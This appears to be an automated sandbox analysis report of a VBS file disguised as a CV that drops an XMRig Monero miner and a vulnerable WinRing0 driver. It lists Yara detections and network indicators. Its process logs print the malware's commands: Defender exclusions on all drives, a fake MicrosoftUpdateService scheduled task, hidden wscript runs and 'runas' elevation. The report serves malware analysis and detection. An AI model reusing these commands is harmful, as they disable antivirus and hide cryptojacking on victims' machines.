Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144

Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)

Source: unknown	HTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49713 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Wscript called in batch mode (surpress errors)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"

Potential malicious VBS script found (suspicious strings)

Source:	Initial file: L5n6SjMwbK03L5.ShellExecute L5H79SnDOdcL5,L5x1dZCrNL5,"","runas",0
Source:	Initial file: L5n6SjMwbK03L5.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34), "", "runas", 1

Source: C:\Users\Public\7g.exe	Code function: 11_2_003F3F02
Source: C:\Users\Public\7g.exe	Code function: 11_2_00418250
Source: C:\Users\Public\7g.exe	Code function: 11_2_00414238
Source: C:\Users\Public\7g.exe	Code function: 11_2_003C8374
Source: C:\Users\Public\7g.exe	Code function: 11_2_0040C3C0
Source: C:\Users\Public\7g.exe	Code function: 11_2_0041C3D0
Source: C:\Users\Public\7g.exe	Code function: 11_2_0040C520
Source: C:\Users\Public\7g.exe	Code function: 11_2_004225BA
Source: C:\Users\Public\7g.exe	Code function: 11_2_003DE64C
Source: C:\Users\Public\7g.exe	Code function: 11_2_004226A1
Source: C:\Users\Public\7g.exe	Code function: 11_2_003CA6D7
Source: C:\Users\Public\7g.exe	Code function: 11_2_003FC7CC
Source: C:\Users\Public\7g.exe	Code function: 11_2_003CA8A6
Source: C:\Users\Public\7g.exe	Code function: 11_2_0041E9D0
Source: C:\Users\Public\7g.exe	Code function: 11_2_0040AA30
Source: C:\Users\Public\7g.exe	Code function: 11_2_00406A90
Source: C:\Users\Public\7g.exe	Code function: 11_2_00414B70
Source: C:\Users\Public\7g.exe	Code function: 11_2_0041EBA9
Source: C:\Users\Public\7g.exe	Code function: 11_2_003CCC1E
Source: C:\Users\Public\7g.exe	Code function: 11_2_00410DF9
Source: C:\Users\Public\7g.exe	Code function: 11_2_00414E90
Source: C:\Users\Public\7g.exe	Code function: 11_2_00413110
Source: C:\Users\Public\7g.exe	Code function: 11_2_004191D0
Source: C:\Users\Public\7g.exe	Code function: 11_2_00413190
Source: C:\Users\Public\7g.exe	Code function: 11_2_004152C0
Source: C:\Users\Public\7g.exe	Code function: 11_2_0041D2D0
Source: C:\Users\Public\7g.exe	Code function: 11_2_00417290
Source: C:\Users\Public\7g.exe	Code function: 11_2_003B537F
Source: C:\Users\Public\7g.exe	Code function: 11_2_003F9348
Source: C:\Users\Public\7g.exe	Code function: 11_2_004213A0
Source: C:\Users\Public\7g.exe	Code function: 11_2_003B9436
Source: C:\Users\Public\7g.exe	Code function: 11_2_00411410
Source: C:\Users\Public\7g.exe	Code function: 11_2_0041D480
Source: C:\Users\Public\7g.exe	Code function: 11_2_003B1572
Source: C:\Users\Public\7g.exe	Code function: 11_2_0040B5B0

Source: curriculum_vitae-copie.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Users\Public\7g.exe

File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\Public\WindowsUpdate\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: 11.3.7g.exe.3a0ca00.3.raw.unpack, type: UNPACKEDPE	Matched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000011.00000002.868028749.0000022E67CE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000013.00000002.992637368.000001854050B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 0000000B.00000003.815621184.0000000001480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000019.00000003.898659213.000001FFE094A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000002.898732843.000001DBC7705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000017.00000003.880754735.000001E320A92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000016.00000002.880872368.000001959AF15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000013.00000002.992637368.0000018540500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 4860, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTR	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 4620, type: MEMORYSTR	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: wscript.exe PID: 6596, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 6548, type: MEMORYSTR	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: wscript.exe PID: 6712, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 6860, type: MEMORYSTR	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\Public\WindowsUpdate\mservice.vbs, type: DROPPED	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: C:\Users\Public\WindowsUpdate\WinRing0x64.sys, type: DROPPED	Matched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: C:\Users\Public\7g.exe	Code function: String function: 003B1E40 appears 118 times
Source: C:\Users\Public\7g.exe	Code function: String function: 0041F1B0 appears 394 times

Source: C:\Users\Public\7g.exe

Code function: 11_2_003B81D9: __EH_prolog,DeviceIoControl,

Source: C:\Users\Public\7g.exe

Process token adjusted: Security

Source: go.exe.11.dr

Static PE information: Section: UPX1 ZLIB complexity 0.993395475414692

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\Public\computer_7

Jump to behavior

Source: WinRing0x64.sys.11.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.evad.mine.winVBS@29/17@2/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"

Source: curriculum_vitae-copie.vbs

Virustotal: Detection: 10%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
Source: C:\Users\Public\7g.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
